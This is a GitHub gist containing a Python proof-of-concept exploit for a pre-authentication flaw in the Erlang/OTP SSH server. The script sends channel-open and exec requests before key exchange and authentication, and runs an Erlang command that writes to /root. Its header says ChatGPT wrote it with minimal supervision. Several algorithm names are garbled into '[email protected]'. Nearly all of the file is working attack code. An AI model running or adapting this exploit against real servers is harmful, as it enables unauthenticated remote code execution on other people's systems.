Skip to content

Instantly share code, notes, and snippets.

@gdbinit
Created April 17, 2025 20:44
Show Gist options
  • Select an option

  • Save gdbinit/e08e95ce77e031cd223c537ef67ed638 to your computer and use it in GitHub Desktop.

Select an option

Save gdbinit/e08e95ce77e031cd223c537ef67ed638 to your computer and use it in GitHub Desktop.
Erlang/OTP SSH Exploit PoC
#
# Erlang/OTP SSH Exploit
#
# Written by ChatGPT with minimal supervision starting from the test case
# Tested against Erlang/OTP 26.2.5.6
#
# Have fun,
# fG!
#
import socket
import os
import struct
import time
# TCP port that main() connects to.
SSH_PORT = 2222
# Address of the SSH server that main() connects to (IPv4 loopback).
SSH_SERVER = '127.0.0.1'
def build_ssh_string(s):
    """Encode *s* as an SSH ``string``: 4-byte big-endian length, then the data.

    Args:
        s: Text, which is encoded with ``str.encode()`` (UTF-8), or an
            already-encoded ``bytes``/``bytearray`` value, which is used as is.

    Returns:
        The length-prefixed value as ``bytes``.
    """
    if isinstance(s, (bytes, bytearray)):
        data = bytes(s)
    else:
        data = s.encode()
    # The prefix must count encoded bytes, not characters; the two differ as
    # soon as the text contains a non-ASCII character.
    return struct.pack('>I', len(data)) + data
def random_bytes(n):
    """Return *n* bytes obtained from ``os.urandom``."""
    fresh = os.urandom(n)
    return fresh
def build_kexinit_packet():
    """Build a framed SSH_MSG_KEXINIT packet.

    The payload is the message type byte, a 16-byte random cookie, ten
    length-prefixed name-lists (the encryption, MAC and compression lists are
    each sent twice, once per direction; both language lists are empty), the
    ``first_kex_packet_follows`` flag and a 4-byte reserved field.

    NOTE(review): several list entries read ``[email protected]``, which looks
    like e-mail obfuscation residue from the page this was copied from rather
    than real algorithm names -- confirm against the intended lists.

    Returns:
        The payload framed by ``wrap_packet``.
    """
    body = bytearray(b'\x14')  # SSH_MSG_KEXINIT
    body += random_bytes(16)  # cookie

    kex = build_ssh_string('curve25519-sha256,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c')
    host_keys = build_ssh_string('[email protected],[email protected],[email protected],ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,[email protected],[email protected],[email protected],[email protected],ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa')
    ciphers = build_ssh_string('[email protected],aes128-ctr,aes192-ctr,aes256-ctr,[email protected],[email protected]')
    macs = build_ssh_string('[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],hmac-sha2-256,hmac-sha2-512,hmac-sha1')
    compression = build_ssh_string('none,[email protected],zlib')
    no_languages = build_ssh_string('')

    name_lists = (
        kex,
        host_keys,
        ciphers,       # client to server
        ciphers,       # server to client
        macs,          # client to server
        macs,          # server to client
        compression,   # client to server
        compression,   # server to client
        no_languages,  # languages_client_to_server
        no_languages,  # languages_server_to_client
    )
    for name_list in name_lists:
        body += name_list

    body += b'\x00'  # first_kex_packet_follows
    body += b'\x00\x00\x00\x00'  # reserved
    return wrap_packet(bytes(body))
def wrap_packet(payload):
    """Frame *payload* as an unencrypted SSH binary packet.

    Layout: 4-byte big-endian ``packet_length``, 1-byte ``padding_length``,
    the payload, then random padding. The padding is sized so the whole
    packet is a multiple of 8 bytes and the padding is at least 4 bytes.

    Args:
        payload: The message bytes to frame.

    Returns:
        The complete packet as bytes.
    """
    alignment = 8
    header_size = 5  # 4-byte packet_length + 1-byte padding_length
    # Bytes needed to reach the next multiple of `alignment`; this yields 0
    # when already aligned, which the minimum-padding bump below turns into 8.
    pad_len = -(len(payload) + header_size) % alignment
    if pad_len < 4:
        pad_len += alignment
    filler = os.urandom(pad_len)
    # packet_length counts the padding_length byte, the payload and the padding.
    header = struct.pack('>IB', len(payload) + pad_len + 1, pad_len)
    return header + payload + filler
def build_channel_open():
    """Build a framed SSH_MSG_CHANNEL_OPEN packet for a ``session`` channel.

    Returns:
        The payload framed by ``wrap_packet``.
    """
    numeric_fields = struct.pack(
        '>III',
        0,        # sender channel
        0x68000,  # initial window size
        0x10000,  # maximum packet size
    )
    # 0x5a is the message type byte for the channel-open message.
    return wrap_packet(b'\x5a' + build_ssh_string('session') + numeric_fields)
def build_channel_request():
    """Build a framed SSH_MSG_CHANNEL_REQUEST packet carrying an ``exec`` request.

    Returns:
        The payload framed by ``wrap_packet``.
    """
    fields = (
        b'\x62',                   # message type byte
        struct.pack('>I', 0),      # recipient channel
        build_ssh_string('exec'),  # request type
        b'\x01',                   # want_reply
        # the command we want to send
        build_ssh_string('file:write_file("/root/pwned", "hello!").'),
    )
    return wrap_packet(b''.join(fields))
def _recv_exact(sock, count, error_message):
    """Read exactly *count* bytes from *sock*, looping over short reads."""
    chunks = []
    remaining = count
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            # An empty read means the peer closed the connection early.
            raise ValueError(error_message)
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)


def recv_packet(sock):
    """Read one unencrypted SSH binary packet from *sock*.

    Args:
        sock: An object with a ``recv(n)`` method returning up to *n* bytes
            (empty bytes once the peer has closed the connection).

    Returns:
        A ``(msg_type, payload)`` tuple: the first payload byte as an int and
        the payload bytes with the trailing padding removed.

    Raises:
        ValueError: If the connection ends before a whole packet arrives, or
            the header describes a packet with no payload.
    """
    # recv() may legitimately return fewer bytes than requested, so both the
    # header and the body are read in a loop until complete.
    hdr = _recv_exact(sock, 5, "Incomplete SSH packet header received")
    packet_length, padding_length = struct.unpack('>IB', hdr)
    # packet_length counts the padding_length byte, the payload and the padding.
    payload_length = packet_length - padding_length - 1
    if payload_length < 1:
        raise ValueError("SSH packet has no payload")
    body = _recv_exact(sock, packet_length - 1,
                       "Incomplete SSH packet body received")
    payload = body[:payload_length]
    return payload[0], payload
def main():
    """Run the message sequence against ``SSH_SERVER:SSH_PORT`` and print progress.

    Exchanges banners, sends SSH_MSG_KEXINIT and reads one server packet, then
    sends SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST without performing
    key exchange or authentication first, and prints whatever comes back.
    Errors while reading server data are printed rather than raised.
    """
    # The context manager closes the socket even if a step below raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((SSH_SERVER, SSH_PORT))

        # Step 1: Receive banner
        banner = s.recv(256)
        # The banner is only printed, so undecodable bytes are replaced
        # instead of aborting the run.
        print(f"[+] Server banner: {banner.decode(errors='replace').strip()}")

        # Step 2: Send client banner
        client_banner = b'SSH-2.0-EarlyRCE_KEXINIT_Test\r\n'
        s.sendall(client_banner)
        print("[+] Sent client banner")
        time.sleep(0.5)

        # Step 3: Send KEXINIT
        kexinit_packet = build_kexinit_packet()
        s.sendall(kexinit_packet)
        print("[+] Sent valid SSH_MSG_KEXINIT")

        # Step 4: Receive server response
        try:
            msg_type, payload = recv_packet(s)
            print(f"[+] Received server message type: {msg_type:#04x}")
            if msg_type == 0x14:
                print("[*] Server responded with SSH_MSG_KEXINIT (as expected).")
                print(payload)
            else:
                print(f"[*] Server responded with unexpected message: type {msg_type}")
        except Exception as e:
            # Best effort: a malformed or missing reply is reported and the
            # sequence carries on.
            print(f"[-] Error reading server response: {e}")

        # Step 5: Send CHANNEL_OPEN early
        s.sendall(build_channel_open())
        print("[+] Sent SSH_MSG_CHANNEL_OPEN (early)")
        time.sleep(0.5)

        # Step 6: Send CHANNEL_REQUEST early
        s.sendall(build_channel_request())
        print("[+] Sent SSH_MSG_CHANNEL_REQUEST (early)")

        # Step 7: Receive server's reaction
        try:
            response = s.recv(1024)
            print("[+] Server response:", response)
        except OSError as e:
            print("[-] Error receiving response:", e)
# Run main() only when this file is executed as a script, not when imported.
if __name__ == '__main__':
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment